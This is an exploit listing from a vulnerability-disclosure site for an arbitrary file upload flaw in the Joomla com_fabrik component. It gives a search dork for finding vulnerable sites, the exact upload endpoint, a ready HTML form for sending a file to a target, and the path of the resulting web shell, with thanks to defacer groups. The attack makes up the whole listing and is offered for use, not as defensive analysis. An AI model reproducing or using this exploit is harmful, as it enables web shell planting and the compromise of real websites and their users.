Joomla Com_fabrik Upload Shell

2017.12.13
id KING Zer0 (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] [+] $ Exploit Title : Joomla Com_fabrik Upload Shell [+] [+] $ Dork : inurl:index.php?option=com_fabrik [+] [+] $ Author: KING Zer0 [+] [+] $ Tested : win - Linux [+] [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] [+] -----------------------------------------------------------| |[+] Exploit : |[+] |[+] /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload |[+] |[+] Vuln = {"filepath":null,"uri":null} |[+] |[+] Csrf = <form method="POST" action="http://target.com/index.php? |[+] option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" |[+] enctype="multipart/form-data"> |[+] <input type="file" name="file" /><button>Upload</button> |[+] </form> |[+] |[+] |[+] |[+] |[+] |[+] $ Your Access Shell: /patch/file.php |[+] -----------------------------------------------------------| # Thanks to : Mr.Aljabar - RootNatsuhaa - 66H057in53CUR17Y - Xai Syndicate - PhantomGhost - All Defacer Indonesia


Vote for this issue:
13%
87%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top